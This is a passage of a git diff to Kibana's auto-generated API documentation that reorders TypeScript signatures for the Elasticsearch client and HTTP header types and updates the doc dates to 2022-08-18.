symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1176,6 +1174,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -1603,7 +1603,61 @@ "label": "internalClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -1671,7 +1721,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -1697,33 +1747,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -1749,33 +1773,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -2735,6 +2733,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/kbn_core_elasticsearch_server_internal.mdx b/api_docs/kbn_core_elasticsearch_server_internal.mdx index f751875e20763..39dcd4303d4d7 100644 --- a/api_docs/kbn_core_elasticsearch_server_internal.mdx +++ b/api_docs/kbn_core_elasticsearch_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-server-internal title: "@kbn/core-elasticsearch-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-server-internal'] --- import kbnCoreElasticsearchServerInternalObj from './kbn_core_elasticsearch_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_server_mocks.mdx b/api_docs/kbn_core_elasticsearch_server_mocks.mdx index d0f0fab5c0b7b..774053af02777 100644 --- a/api_docs/kbn_core_elasticsearch_server_mocks.mdx +++ b/api_docs/kbn_core_elasticsearch_server_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-server-mocks title: "@kbn/core-elasticsearch-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-server-mocks'] --- import kbnCoreElasticsearchServerMocksObj from './kbn_core_elasticsearch_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_environment_server_internal.mdx b/api_docs/kbn_core_environment_server_internal.mdx index a14db3412623e..7240e5abd4245 100644 --- a/api_docs/kbn_core_environment_server_internal.mdx +++ b/api_docs/kbn_core_environment_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-environment-server-internal title: "@kbn/core-environment-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-environment-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-environment-server-internal'] --- import kbnCoreEnvironmentServerInternalObj from './kbn_core_environment_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_environment_server_mocks.mdx b/api_docs/kbn_core_environment_server_mocks.mdx index cc754fbb24087..87bc881350ed0 100644 --- a/api_docs/kbn_core_environment_server_mocks.mdx +++ b/api_docs/kbn_core_environment_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-environment-server-mocks title: "@kbn/core-environment-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-environment-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-environment-server-mocks'] --- import kbnCoreEnvironmentServerMocksObj from './kbn_core_environment_server_mocks.devdocs.json'; 
diff --git a/api_docs/kbn_core_execution_context_browser.mdx b/api_docs/kbn_core_execution_context_browser.mdx index 1a257ac01fb04..583d395d07768 100644 --- a/api_docs/kbn_core_execution_context_browser.mdx +++ b/api_docs/kbn_core_execution_context_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-browser title: "@kbn/core-execution-context-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-browser'] --- import kbnCoreExecutionContextBrowserObj from './kbn_core_execution_context_browser.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_browser_internal.mdx b/api_docs/kbn_core_execution_context_browser_internal.mdx index b4ccae312f808..2c3098e588910 100644 --- a/api_docs/kbn_core_execution_context_browser_internal.mdx +++ b/api_docs/kbn_core_execution_context_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-browser-internal title: "@kbn/core-execution-context-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-browser-internal'] --- import kbnCoreExecutionContextBrowserInternalObj from './kbn_core_execution_context_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_browser_mocks.mdx b/api_docs/kbn_core_execution_context_browser_mocks.mdx index 6e303aea9a8b9..04d7dd0c8c613 100644 --- a/api_docs/kbn_core_execution_context_browser_mocks.mdx +++ b/api_docs/kbn_core_execution_context_browser_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-browser-mocks title: "@kbn/core-execution-context-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-browser-mocks'] --- import kbnCoreExecutionContextBrowserMocksObj from './kbn_core_execution_context_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_common.mdx b/api_docs/kbn_core_execution_context_common.mdx index 6bfe8f5e96039..7e019164ad89b 100644 --- a/api_docs/kbn_core_execution_context_common.mdx +++ b/api_docs/kbn_core_execution_context_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-common title: "@kbn/core-execution-context-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-common'] --- import kbnCoreExecutionContextCommonObj from './kbn_core_execution_context_common.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_server.mdx b/api_docs/kbn_core_execution_context_server.mdx index 7cd960c4de634..f5049184de13b 100644 --- a/api_docs/kbn_core_execution_context_server.mdx +++ b/api_docs/kbn_core_execution_context_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-server title: "@kbn/core-execution-context-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-server'] --- import kbnCoreExecutionContextServerObj from './kbn_core_execution_context_server.devdocs.json'; 
diff --git a/api_docs/kbn_core_execution_context_server_internal.mdx b/api_docs/kbn_core_execution_context_server_internal.mdx index 0a4e462c51f0d..0c75bf83ccdf7 100644 --- a/api_docs/kbn_core_execution_context_server_internal.mdx +++ b/api_docs/kbn_core_execution_context_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-server-internal title: "@kbn/core-execution-context-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-server-internal'] --- import kbnCoreExecutionContextServerInternalObj from './kbn_core_execution_context_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_server_mocks.mdx b/api_docs/kbn_core_execution_context_server_mocks.mdx index 68f827b7f3bf9..ab041fb4d9c6f 100644 --- a/api_docs/kbn_core_execution_context_server_mocks.mdx +++ b/api_docs/kbn_core_execution_context_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-server-mocks title: "@kbn/core-execution-context-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-server-mocks'] --- import kbnCoreExecutionContextServerMocksObj from './kbn_core_execution_context_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_fatal_errors_browser.mdx b/api_docs/kbn_core_fatal_errors_browser.mdx index e099829b9d812..8e1ec0f65a923 100644 --- a/api_docs/kbn_core_fatal_errors_browser.mdx +++ b/api_docs/kbn_core_fatal_errors_browser.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-fatal-errors-browser title: "@kbn/core-fatal-errors-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-fatal-errors-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-fatal-errors-browser'] --- import kbnCoreFatalErrorsBrowserObj from './kbn_core_fatal_errors_browser.devdocs.json'; diff --git a/api_docs/kbn_core_fatal_errors_browser_mocks.mdx b/api_docs/kbn_core_fatal_errors_browser_mocks.mdx index c86d7a66254cc..7e5e287bbaaea 100644 --- a/api_docs/kbn_core_fatal_errors_browser_mocks.mdx +++ b/api_docs/kbn_core_fatal_errors_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-fatal-errors-browser-mocks title: "@kbn/core-fatal-errors-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-fatal-errors-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-fatal-errors-browser-mocks'] --- import kbnCoreFatalErrorsBrowserMocksObj from './kbn_core_fatal_errors_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_browser.devdocs.json b/api_docs/kbn_core_http_browser.devdocs.json index d39d743fa868f..492a459206603 100644 --- a/api_docs/kbn_core_http_browser.devdocs.json +++ b/api_docs/kbn_core_http_browser.devdocs.json 
@@ -259,12 +259,12 @@ "id": "def-common.HttpFetchQuery.Unnamed", "type": "IndexSignature", "tags": [], - "label": "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined", + "label": "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined", "description": [ "\nTypeScript note: Technically we should use this interface instead, but @types/node uses the below stricter\ndefinition, so to avoid TypeScript errors, we'll restrict our version.\n\n[key: string]:\n | string\n | number\n | boolean\n | Array\n | undefined\n | null;" ], "signature": [ - "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined" + "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined" ], "path": "packages/core/http/core-http-browser/src/types.ts", "deprecated": false diff --git a/api_docs/kbn_core_http_browser.mdx b/api_docs/kbn_core_http_browser.mdx index aab9d4d5da4b6..e554e7b5e6bb6 100644 --- a/api_docs/kbn_core_http_browser.mdx +++ b/api_docs/kbn_core_http_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-browser title: "@kbn/core-http-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-browser'] --- import kbnCoreHttpBrowserObj from './kbn_core_http_browser.devdocs.json'; diff --git a/api_docs/kbn_core_http_browser_internal.mdx b/api_docs/kbn_core_http_browser_internal.mdx index 7794fe20db1ee..7584e0edc1dfd 100644 --- a/api_docs/kbn_core_http_browser_internal.mdx +++ b/api_docs/kbn_core_http_browser_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-browser-internal title: "@kbn/core-http-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-browser-internal'] --- import kbnCoreHttpBrowserInternalObj from './kbn_core_http_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_http_browser_mocks.mdx b/api_docs/kbn_core_http_browser_mocks.mdx index 35925b74efee7..daf6547d14761 100644 --- a/api_docs/kbn_core_http_browser_mocks.mdx +++ b/api_docs/kbn_core_http_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-browser-mocks title: "@kbn/core-http-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-browser-mocks'] --- import kbnCoreHttpBrowserMocksObj from './kbn_core_http_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_common.mdx b/api_docs/kbn_core_http_common.mdx index d0f8fbf3e0b9a..f43008bd1de28 100644 --- a/api_docs/kbn_core_http_common.mdx +++ b/api_docs/kbn_core_http_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-common title: "@kbn/core-http-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-common'] --- import kbnCoreHttpCommonObj from './kbn_core_http_common.devdocs.json'; diff --git a/api_docs/kbn_core_http_context_server_mocks.mdx b/api_docs/kbn_core_http_context_server_mocks.mdx index 6846f1f6ae7b4..9fa36dedf7330 100644 --- a/api_docs/kbn_core_http_context_server_mocks.mdx +++ b/api_docs/kbn_core_http_context_server_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-context-server-mocks title: "@kbn/core-http-context-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-context-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-context-server-mocks'] --- import kbnCoreHttpContextServerMocksObj from './kbn_core_http_context_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_router_server_internal.mdx b/api_docs/kbn_core_http_router_server_internal.mdx index 068e9027c45dc..b4a2ba93627b5 100644 --- a/api_docs/kbn_core_http_router_server_internal.mdx +++ b/api_docs/kbn_core_http_router_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-router-server-internal title: "@kbn/core-http-router-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-router-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-router-server-internal'] --- import kbnCoreHttpRouterServerInternalObj from './kbn_core_http_router_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_http_router_server_mocks.mdx b/api_docs/kbn_core_http_router_server_mocks.mdx index 6dc19cbd665e1..6cb7f42149ad2 100644 --- a/api_docs/kbn_core_http_router_server_mocks.mdx +++ b/api_docs/kbn_core_http_router_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-router-server-mocks title: "@kbn/core-http-router-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-router-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-router-server-mocks'] --- import kbnCoreHttpRouterServerMocksObj from './kbn_core_http_router_server_mocks.devdocs.json'; 
diff --git a/api_docs/kbn_core_http_server.devdocs.json b/api_docs/kbn_core_http_server.devdocs.json index 97a0dd3ec3e50..036e900ab9e8d 100644 --- a/api_docs/kbn_core_http_server.devdocs.json +++ b/api_docs/kbn_core_http_server.devdocs.json 
@@ -4073,7 +4073,7 @@ "\nReadonly copy of incoming request headers." ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: 
string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: 
string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | 
undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "packages/core/http/core-http-server/src/router/request.ts", "deprecated": false 
@@ -4344,7 +4344,7 @@ "label": "options", "description": [], "signature": [ - "Method extends \"options\" | \"get\" ? Required | Record" + "Record<\"accept\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"allow\" | \"alt-svc\" | \"authorization\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"date\" | \"etag\" | \"expect\" | \"expires\" | \"forwarded\" | \"from\" | \"host\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"location\" | \"origin\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"range\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"warning\" | \"www-authenticate\", string | string[]> | Record" ], "path": "packages/core/http/core-http-server/src/router/headers.ts", "deprecated": false, @@ -8418,7 +8418,7 @@ "\nSet of HTTP methods not changing the state of the server." ], "signature": [ - "\"options\" | \"get\"" + "\"get\" | \"options\"" ], "path": "packages/core/http/core-http-server/src/router/route.ts", "deprecated": false, diff --git a/api_docs/kbn_core_http_server.mdx b/api_docs/kbn_core_http_server.mdx index c93d460376f93..4ab4d705475c4 100644 --- a/api_docs/kbn_core_http_server.mdx 
+++ b/api_docs/kbn_core_http_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-server title: "@kbn/core-http-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-server'] --- import kbnCoreHttpServerObj from './kbn_core_http_server.devdocs.json'; diff --git a/api_docs/kbn_core_http_server_internal.devdocs.json b/api_docs/kbn_core_http_server_internal.devdocs.json index b0c482d9afc03..87f187a690989 100644 --- a/api_docs/kbn_core_http_server_internal.devdocs.json +++ b/api_docs/kbn_core_http_server_internal.devdocs.json 
